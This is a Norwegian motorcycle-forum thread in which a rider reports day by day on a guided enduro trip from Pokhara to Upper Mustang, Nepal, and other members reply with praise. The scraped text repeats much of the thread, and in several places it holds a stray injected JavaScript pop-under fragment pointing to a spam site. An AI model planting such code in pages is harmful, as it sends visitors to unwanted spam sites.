Himalaya - Upper Mustang Nepal
Himalaya - Upper Mustang Nepal
OK, denne kan bli lang og vær forberedt på mye bilder, kan ta noen dager å få lagt ut alt
Himalaya og Nepal har vært på bucket-lista en stund men begynte for alvor å se på tur dit for års tid siden. I utgangspunktet tenkte jeg på Everest Basecamp på MC, som er fullt mulig, men ifølge de som hadde greie på det er det en finere tur til Upper Mustang opp til grensen til Tibet. Svei litt å droppe Everest, hadde vært kult å sett verdens høyeste fjell, men etter sigende flere topper over 8000moh dit vi dro...for ble Upper Mustang. Flere som arrangerer turer dit, også skandinaviske selskap men gikk for www.heartsandtears.com da de fikk utelukkende bra omtale og angret ikke på dette. De var svært fleksible både før og under turen og veldig profesjonelt opplegg, anbefales
Selvfølgelig mulig å melde seg på standard tur men fikk trommet sammen en del kompiser vet kan kjøre MC og som fungerer bra sammen sosialt, til sammen ble vi 7 stykker, mer enn nok til at fikk satt opp egen gruppe. I utgangspunktet var det en 11 dagers tur men Matt hos H&T fikk komprimert det til 8 dager (som ble 7 dager, kommer tilbake til dette), kunne da selges inn som drøy 1 ukes tur på jobb og hjemme, 11 dager er i praksis 2 uker som sitter lenger inne hos en del.
Vi hadde avreise torsdag 3/10 men ble dramatikk på Gardermoen da en av deltagerne hadde pass som gikk ut 3 dager før de obligatoriske 6 månedene og ble nektet å fly. Så måtte slukøret dra hjem igjen men rakk det langåpne passkontoret på Kongsberg 10 minutter før stengetid og hentet nytt pass i Oslo neste dag og dro dagen etter oss andre.
Nuff talk, etter en svært hektisk runde på flyplassen i Kathmandu kunne vi svette men lettet sette oss på lokalfly til Pokhara og fikk litt forsmak på hva som ventet oss fra flyvinduet
I Pokhara var det nydelig vær og ølen smakte svært så godt i varmen
Etter et par timer ble vi hentet og geleidet de 5 minuttene far hotellet til Hearts & Tears lokaler som var en miks av garasje, kontor og bar, ganske kult egentlig. Hyggelig å hilse på Matt (med caps midt i bilde under) som hadde kommunisert så mye med men hadde skulle ta amerikansk gruppe noen dager senere så vi fikk radarparet Prabin som guide og Surja som mekaniker/sweeper, begge helt suverene
Så ble det en aldri så liten bar-runde selv om i ettertid så at nok kunne stått over de siste 3 drinkene
Får fortsette i morgen men liten teaser på hva som kommer:
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Himalaya og Nepal har vært på bucket-lista en stund men begynte for alvor å se på tur dit for års tid siden. I utgangspunktet tenkte jeg på Everest Basecamp på MC, som er fullt mulig, men ifølge de som hadde greie på det er det en finere tur til Upper Mustang opp til grensen til Tibet. Svei litt å droppe Everest, hadde vært kult å sett verdens høyeste fjell, men etter sigende flere topper over 8000moh dit vi dro...for ble Upper Mustang. Flere som arrangerer turer dit, også skandinaviske selskap men gikk for www.heartsandtears.com da de fikk utelukkende bra omtale og angret ikke på dette. De var svært fleksible både før og under turen og veldig profesjonelt opplegg, anbefales
Selvfølgelig mulig å melde seg på standard tur men fikk trommet sammen en del kompiser vet kan kjøre MC og som fungerer bra sammen sosialt, til sammen ble vi 7 stykker, mer enn nok til at fikk satt opp egen gruppe. I utgangspunktet var det en 11 dagers tur men Matt hos H&T fikk komprimert det til 8 dager (som ble 7 dager, kommer tilbake til dette), kunne da selges inn som drøy 1 ukes tur på jobb og hjemme, 11 dager er i praksis 2 uker som sitter lenger inne hos en del.
Vi hadde avreise torsdag 3/10 men ble dramatikk på Gardermoen da en av deltagerne hadde pass som gikk ut 3 dager før de obligatoriske 6 månedene og ble nektet å fly. Så måtte slukøret dra hjem igjen men rakk det langåpne passkontoret på Kongsberg 10 minutter før stengetid og hentet nytt pass i Oslo neste dag og dro dagen etter oss andre.
Nuff talk, etter en svært hektisk runde på flyplassen i Kathmandu kunne vi svette men lettet sette oss på lokalfly til Pokhara og fikk litt forsmak på hva som ventet oss fra flyvinduet
I Pokhara var det nydelig vær og ølen smakte svært så godt i varmen
Etter et par timer ble vi hentet og geleidet de 5 minuttene far hotellet til Hearts & Tears lokaler som var en miks av garasje, kontor og bar, ganske kult egentlig. Hyggelig å hilse på Matt (med caps midt i bilde under) som hadde kommunisert så mye med men hadde skulle ta amerikansk gruppe noen dager senere så vi fikk radarparet Prabin som guide og Surja som mekaniker/sweeper, begge helt suverene
Så ble det en aldri så liten bar-runde selv om i ettertid så at nok kunne stått over de siste 3 drinkene
Får fortsette i morgen men liten teaser på hva som kommer:
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
- Olav K
- Innlegg: 2639
- Registrert: 18 mai 2013, 14:07
- Motorsykkelen din: Den Beste Sykkel (BMW R1250GSA 2019)
- Sted: Odda/Rosendal
Re: Himalaya - Upper Mustang Nepal
Mer mer mer....
http://www.kant1.no" onclick="window.open(this.href);return false;
Re: Himalaya - Upper Mustang Nepal
Fy flate! Eller kanskje stikk motsatt ! Tøft. Mer!
Re: Himalaya - Upper Mustang Nepal
Den brua hadde tatt knekken på meg psykisk tror jeg... Elles, takk for at du deler.
2019 KTM 790 Adventure
2008 KTM Duke 690
2008 KTM Duke 690
- Snekker.edvin
- Innlegg: 496
- Registrert: 30 des 2017, 23:30
- Motorsykkelen din: Yamaha TDM 850
Re: Himalaya - Upper Mustang Nepal
Fantastisk. Gratulerer med tydelig julegave!
Og - mer, mer og meeer
Og - mer, mer og meeer
-
OnlineAJ
- Administrator
- Innlegg: 37981
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Himalaya - Upper Mustang Nepal
Ojsann !
Dette ser helt megamagisk ut og viser hva man kan oppleve når man tar sjansen på å leve drømmen fullt ut !
Takk for at du deler en flik av hva dere har opplevd .
Dette ser helt megamagisk ut og viser hva man kan oppleve når man tar sjansen på å leve drømmen fullt ut !
Takk for at du deler en flik av hva dere har opplevd .
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
Re: Himalaya - Upper Mustang Nepal
1. Kjøredag, Pokhara-Mallaj
Må først skynde meg å si at ikke bare mine bilder men også fra de andre. Mest mobilbilder men 2 av gutta hadde med systemkamera så noen kamerabilder. Den andre gruppen rappet dronen, litt synd, hadde vært kult med litt dronefilm. Og Matt, eieren, er også mer på å ta bilder underveis. MEN for å være ærlig, har alltid ment at opplevelsen er viktigere enn bilder og video. Går litt tid om skal finne frem drone, gjøre klar, defilere, pakke sammen etc etc, lett at tar litt fokus. Og vi kjørte nokså lange dager (ref kjørte 11 dagers på 7 dager). Men gå gjerne inn å se på bilder på H&Ts facebook side, mye flotte bilder og videoer fra der vi kjørte.
Mhp sykler, hadde valget mellom Royal Enfield 401 Himalayan, denne er helt nyutviklet og fått bra kritikk, og kinesiske Crossfire 250 enduroer. Vi gikk for det siste og det var lurt, 90% av ruten hadde gått helt greit med 401 men var noen litt rufsete steder (vi valgte det såkalte enduro option) hvor lett sykkel var tingen. Men for de som er happy med å følge veiene, selv de rufsete, er 401en et bra valgt, mer komfortabel og langbeint. Er du hipster hadde de også gamle Royal Enfields, ikke så bra sykler kanskje men ser sikkert kult ut på bilder
Måtte kalibrere seg litt inn på 250ene, hverken dempere, bremser eller motor var på nivå med KTM (som er svindyre i Nepal) men fikk gjort jobben. Dvs., mekanikeren hadde hendene fulle til tider, stadig noe som skjedde, litt av skylden får de litt rufsete og steinete veiene ta. Om ikke mekanikeren fikset det på 10-15 minutter, ga han bort sykkelen sin, sendte oss videre og fortsatte å skru. Manglet han deler/verktøy kom følgebilen etterhvert med mer utstyr.
Opplegget var rimelig proft. Guiden Prabin kjørte først og mekanikeren Surja sist som sweeper og i tilfelle mekanisk. Vi hadde også følgebil, den holdt ikke vårt tempo men vi så de typisk til lunch og når kom frem. I tillegg til sjåfør hadde de enda en mekaniker i følgebilen, han doblet som reservesjåfør slik at hvis noen skadet seg kunne han ta MCen videre mens den skadde satt i bilen. Hver kveld gikk de over syklene (mens vi koste oss med en øl...).
Tilbake til kjøringen. Pokhara ligger på 800moh og så ikke de helt høye fjellene første dagen. En del transport og trafikk men slik er det alltid på slike turer, må kjøre litt før kommer vekk fra sivilisasjonen. Men tok noen omveier akkurat nok til at ikke ble for kjedelig men likevel hadde progress. X-faktoren var helt klart hengebroene som vist i video i første post. Ikke noe tilvending her, vi begynte med den aller lengste og høyeste, tror 350m over og 300m over dalbunnen (eller omvendt, husker ikke helt). Litt puls må jeg innrømme men teknisk enkleste på hel turen, broen var dønn stabil. Bildet under viser den andre broen, den sees til venstre i videoen over, litt kortere men lang nok:
De fleste hadde en runde eller to med løs mage, annen bakterieflora og ikke helt der mhp hygiene. Toalettfasiliteten underveis var ofte enkle (i den grad fantes) men må man så må man
Litt før vi var fremme var vi oppom liten tempel-sak på høyde, ikke i nærheten av så spektakulært som vi skulle oppleve etterhvert men likevel Liker treet (blir beskyldt for å være tree hugger ):
EDIT: Lå en schwær kobraslange over veien nedenfor dette som en av gutta kjørte over...han fikk fraskt tilnavnet "Cobra Killa" (fikk ikke tatt bildet av dette da den tross alt overlevde og forsvant ned lia)
Vel fremme bodde vi på kult hotell, the Heritage, Mallaj. Stedet hadde vært fullstendig nedgrodd og bygningen bare et skall da en kar som vokste opp i området og siden hadde gjort det bra, kjøpte det og pusset det opp. Terningkast 6 på sjarm
Enda er det bare oppvarming, kjøredag 2 begynner skikkelig høye fjell å dukke opp
Må først skynde meg å si at ikke bare mine bilder men også fra de andre. Mest mobilbilder men 2 av gutta hadde med systemkamera så noen kamerabilder. Den andre gruppen rappet dronen, litt synd, hadde vært kult med litt dronefilm. Og Matt, eieren, er også mer på å ta bilder underveis. MEN for å være ærlig, har alltid ment at opplevelsen er viktigere enn bilder og video. Går litt tid om skal finne frem drone, gjøre klar, defilere, pakke sammen etc etc, lett at tar litt fokus. Og vi kjørte nokså lange dager (ref kjørte 11 dagers på 7 dager). Men gå gjerne inn å se på bilder på H&Ts facebook side, mye flotte bilder og videoer fra der vi kjørte.
Mhp sykler, hadde valget mellom Royal Enfield 401 Himalayan, denne er helt nyutviklet og fått bra kritikk, og kinesiske Crossfire 250 enduroer. Vi gikk for det siste og det var lurt, 90% av ruten hadde gått helt greit med 401 men var noen litt rufsete steder (vi valgte det såkalte enduro option) hvor lett sykkel var tingen. Men for de som er happy med å følge veiene, selv de rufsete, er 401en et bra valgt, mer komfortabel og langbeint. Er du hipster hadde de også gamle Royal Enfields, ikke så bra sykler kanskje men ser sikkert kult ut på bilder
Måtte kalibrere seg litt inn på 250ene, hverken dempere, bremser eller motor var på nivå med KTM (som er svindyre i Nepal) men fikk gjort jobben. Dvs., mekanikeren hadde hendene fulle til tider, stadig noe som skjedde, litt av skylden får de litt rufsete og steinete veiene ta. Om ikke mekanikeren fikset det på 10-15 minutter, ga han bort sykkelen sin, sendte oss videre og fortsatte å skru. Manglet han deler/verktøy kom følgebilen etterhvert med mer utstyr.
Opplegget var rimelig proft. Guiden Prabin kjørte først og mekanikeren Surja sist som sweeper og i tilfelle mekanisk. Vi hadde også følgebil, den holdt ikke vårt tempo men vi så de typisk til lunch og når kom frem. I tillegg til sjåfør hadde de enda en mekaniker i følgebilen, han doblet som reservesjåfør slik at hvis noen skadet seg kunne han ta MCen videre mens den skadde satt i bilen. Hver kveld gikk de over syklene (mens vi koste oss med en øl...).
Tilbake til kjøringen. Pokhara ligger på 800moh og så ikke de helt høye fjellene første dagen. En del transport og trafikk men slik er det alltid på slike turer, må kjøre litt før kommer vekk fra sivilisasjonen. Men tok noen omveier akkurat nok til at ikke ble for kjedelig men likevel hadde progress. X-faktoren var helt klart hengebroene som vist i video i første post. Ikke noe tilvending her, vi begynte med den aller lengste og høyeste, tror 350m over og 300m over dalbunnen (eller omvendt, husker ikke helt). Litt puls må jeg innrømme men teknisk enkleste på hel turen, broen var dønn stabil. Bildet under viser den andre broen, den sees til venstre i videoen over, litt kortere men lang nok:
De fleste hadde en runde eller to med løs mage, annen bakterieflora og ikke helt der mhp hygiene. Toalettfasiliteten underveis var ofte enkle (i den grad fantes) men må man så må man
Litt før vi var fremme var vi oppom liten tempel-sak på høyde, ikke i nærheten av så spektakulært som vi skulle oppleve etterhvert men likevel Liker treet (blir beskyldt for å være tree hugger ):
EDIT: Lå en schwær kobraslange over veien nedenfor dette som en av gutta kjørte over...han fikk fraskt tilnavnet "Cobra Killa" (fikk ikke tatt bildet av dette da den tross alt overlevde og forsvant ned lia)
Vel fremme bodde vi på kult hotell, the Heritage, Mallaj. Stedet hadde vært fullstendig nedgrodd og bygningen bare et skall da en kar som vokste opp i området og siden hadde gjort det bra, kjøpte det og pusset det opp. Terningkast 6 på sjarm
Enda er det bare oppvarming, kjøredag 2 begynner skikkelig høye fjell å dukke opp
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
- Olav K
- Innlegg: 2639
- Registrert: 18 mai 2013, 14:07
- Motorsykkelen din: Den Beste Sykkel (BMW R1250GSA 2019)
- Sted: Odda/Rosendal
Re: Himalaya - Upper Mustang Nepal
Fantastizk.... endelig et eksotisk eventyr igjen :) gleder meg til å følge denne story'en videre.
http://www.kant1.no" onclick="window.open(this.href);return false;
Re: Himalaya - Upper Mustang Nepal
2. Kjøredag, Mallaj-Marpha
Så endelig skulle vi få se noen skikkelige fjell, om enda på litt avstand Mange gode grunner for å dra på turen, spennende veier å kjøre MC på, oppleve nepalsk kultur, være med gode kompiser...MEN aller mest for å se verdens høyeste fjeller
Men først litt transport, heldigvis mindre trafikk og dårligere (men morsommere!) veier! Og DER dukker plutselig den først +7000 meteren opp i det fjerne Mobilen klarer ikke å formidle hverken opplevelsen eller fargene (toppen er mye hvitere) men spesielt øyeblikk selv om bare forsmak.
Nepalsk hovedvei, heldigvis tørt
Han her satset på å haike, ikke lureste stedet å stå kanskje
Tok en avstikker innover en dal, godt med litt singel trail på skogsbunn etter å ha blitt filleristet på steinete veier
Alltid godt med lunch...spesielt når spisestedet skilter med skikkelig WC (null dopapir riktig nok...lurt hadde med baby wipes!) Var annen gruppe der uten guide også, se bla. BMW 310 i bakgrunnen.
Fulgte mye Gandaki elven på hele turen, side-elv til Ganges og dermed hellig
Og DER dukket det noen bra fjell opp igjen, nærmere denne gangen Tror Annapurna fjellene men får først som sist tilstå ikke har full oversikt over akkurat hvilke topper vi så når og hvor høye de er. Blir heretter derfor mest referert til som "skikkelig høye fjell" som betyr topper på 7-8000moh
Drivstoff må man jo ha, i Himalaya så får man kasse med 1 1/2 litere colaflasker med bensin
Ikke bare i Hardanger man har epler, mye bra eple cider å få i området
Obligatorisk, after-bike øl utenfor hotellet i Marpha, vi er nå på 2700moh
Mens mekanikerne hadde hende fulle i bakgården:
Hvor velholden man er måles i hvor mye ved du har på taket:
Den observante leser husker kanskje at en mann hadde passproblemer og ble en dag forsinket. H&T holdt igjen ene mekanikeren slik at vår mann kunne teame opp med oss etter dag 2 etter laaaang dag på veien med mekanikeren som guide, gjensynsgleden var stor
Hotellstandarden ble enklere og enklere jo lengre opp vi kom, dette er hotellet, ikke lokale fengselet. Lokal og god mat til middag :)
Veldig bra dag og bedre skal det bli, stay tuned
Så endelig skulle vi få se noen skikkelige fjell, om enda på litt avstand Mange gode grunner for å dra på turen, spennende veier å kjøre MC på, oppleve nepalsk kultur, være med gode kompiser...MEN aller mest for å se verdens høyeste fjeller
Men først litt transport, heldigvis mindre trafikk og dårligere (men morsommere!) veier! Og DER dukker plutselig den først +7000 meteren opp i det fjerne Mobilen klarer ikke å formidle hverken opplevelsen eller fargene (toppen er mye hvitere) men spesielt øyeblikk selv om bare forsmak.
Nepalsk hovedvei, heldigvis tørt
Han her satset på å haike, ikke lureste stedet å stå kanskje
Tok en avstikker innover en dal, godt med litt singel trail på skogsbunn etter å ha blitt filleristet på steinete veier
Alltid godt med lunch...spesielt når spisestedet skilter med skikkelig WC (null dopapir riktig nok...lurt hadde med baby wipes!) Var annen gruppe der uten guide også, se bla. BMW 310 i bakgrunnen.
Fulgte mye Gandaki elven på hele turen, side-elv til Ganges og dermed hellig
Og DER dukket det noen bra fjell opp igjen, nærmere denne gangen Tror Annapurna fjellene men får først som sist tilstå ikke har full oversikt over akkurat hvilke topper vi så når og hvor høye de er. Blir heretter derfor mest referert til som "skikkelig høye fjell" som betyr topper på 7-8000moh
Drivstoff må man jo ha, i Himalaya så får man kasse med 1 1/2 litere colaflasker med bensin
Ikke bare i Hardanger man har epler, mye bra eple cider å få i området
Obligatorisk, after-bike øl utenfor hotellet i Marpha, vi er nå på 2700moh
Mens mekanikerne hadde hende fulle i bakgården:
Hvor velholden man er måles i hvor mye ved du har på taket:
Den observante leser husker kanskje at en mann hadde passproblemer og ble en dag forsinket. H&T holdt igjen ene mekanikeren slik at vår mann kunne teame opp med oss etter dag 2 etter laaaang dag på veien med mekanikeren som guide, gjensynsgleden var stor
Hotellstandarden ble enklere og enklere jo lengre opp vi kom, dette er hotellet, ikke lokale fengselet. Lokal og god mat til middag :)
Veldig bra dag og bedre skal det bli, stay tuned
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
Re: Himalaya - Upper Mustang Nepal
Bonusspor, uncut video fra single trail vist i forrige post for den spesielt interesserte
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
Re: Himalaya - Upper Mustang Nepal
3. Kjøredag, Marpha-Ghami
OK, vært fin tur så langt men i dag begynner det virkelig å smake fugl Høyeste vært før på MC er 2950moh (Col du Sommellier i Alpene) og snaut 4000moh på ski. Denne dagen er vi flere ganger oppi rundt 4000moh
Våknet tidlig og gikk oppover i lia og fikk soloppgang over Himalaya med meg, ingen dum start på dagen Har jo til tider vært opp Ollebakkene flere ganger i uken så trodde formen var grei men skal si merket høyden, ble hyppige stopp for å få igjen pusten
Etter kort tids kjøring fikk vi mer nærkontakt med høye fjell:
Så fortsatte vi over hengebro (vært flere av de siden de første store de forseres kjapt) med enda bedre utsikt:
Og opp laaang bakke til 3500moh med DEN panoramautsikten Det var dette jeg hadde kommet for å se, allerede her var turen reddet for min del!
Men må ha mat...mil etter mil
Og påfølgende cowboy-strekk
Par bilder tatt med zoom, må innrømme ikke vet nøyaktig hvor tatt men iflg datoen tatt denne dagen
Dagens destinasjon var Ghami (vårt hotell midt i bildet bak), koselig landsby med flott natur Ifølge guiden er området vi nå har kjørt inn i mer Tibetansk enn Tibet pga kinesernes styring der, da mange tibetanere har flyktet inn i Nepal. Så lenge varer, kineserne begynner å få fotfeste i Nepal også (Ref kinesiske presidentens besøk i Nepal når vi var i Katmandu, kommer tilbake på dette):
OK, vært fin tur så langt men i dag begynner det virkelig å smake fugl Høyeste vært før på MC er 2950moh (Col du Sommellier i Alpene) og snaut 4000moh på ski. Denne dagen er vi flere ganger oppi rundt 4000moh
Våknet tidlig og gikk oppover i lia og fikk soloppgang over Himalaya med meg, ingen dum start på dagen Har jo til tider vært opp Ollebakkene flere ganger i uken så trodde formen var grei men skal si merket høyden, ble hyppige stopp for å få igjen pusten
Etter kort tids kjøring fikk vi mer nærkontakt med høye fjell:
Så fortsatte vi over hengebro (vært flere av de siden de første store de forseres kjapt) med enda bedre utsikt:
Og opp laaang bakke til 3500moh med DEN panoramautsikten Det var dette jeg hadde kommet for å se, allerede her var turen reddet for min del!
Men må ha mat...mil etter mil
Og påfølgende cowboy-strekk
Par bilder tatt med zoom, må innrømme ikke vet nøyaktig hvor tatt men iflg datoen tatt denne dagen
Dagens destinasjon var Ghami (vårt hotell midt i bildet bak), koselig landsby med flott natur Ifølge guiden er området vi nå har kjørt inn i mer Tibetansk enn Tibet pga kinesernes styring der, da mange tibetanere har flyktet inn i Nepal. Så lenge varer, kineserne begynner å få fotfeste i Nepal også (Ref kinesiske presidentens besøk i Nepal når vi var i Katmandu, kommer tilbake på dette):
Sist redigert av pingvin den 24 okt 2019, 21:33, redigert 1 gang totalt.
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
-
OnlineAJ
- Administrator
- Innlegg: 37981
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Himalaya - Upper Mustang Nepal
Fantastisk! Rett og slett !
Igjen takk for at du deler en liten flik av noe som må ha vært en storslått og uforglemmelig opplevelse .
Igjen takk for at du deler en liten flik av noe som må ha vært en storslått og uforglemmelig opplevelse .
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
Re: Himalaya - Upper Mustang Nepal
Jo, takk Facebook er greit det men forum som dette (ikke så mange igjen av de) er mer eget til å fortelle en historie...i hvert fall det forsøker. Og koser meg med arbeidet, blir så mye inntrykk på kort tid når er på slik tur at vanskelig å absorbere og huske alt. Nå må jeg gå gjennom masse bilder og får gjenopplevd turen litt og sortert inntrykkene (godt fleste bildene har tid/dato, forenkler jobben!).
Og enda bare kommet til dag 3 av (i utgangspunktet) 8, blir bare bedre
Og enda bare kommet til dag 3 av (i utgangspunktet) 8, blir bare bedre
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
- Olav K
- Innlegg: 2639
- Registrert: 18 mai 2013, 14:07
- Motorsykkelen din: Den Beste Sykkel (BMW R1250GSA 2019)
- Sted: Odda/Rosendal
Re: Himalaya - Upper Mustang Nepal
Gleder meg til mer
http://www.kant1.no" onclick="window.open(this.href);return false;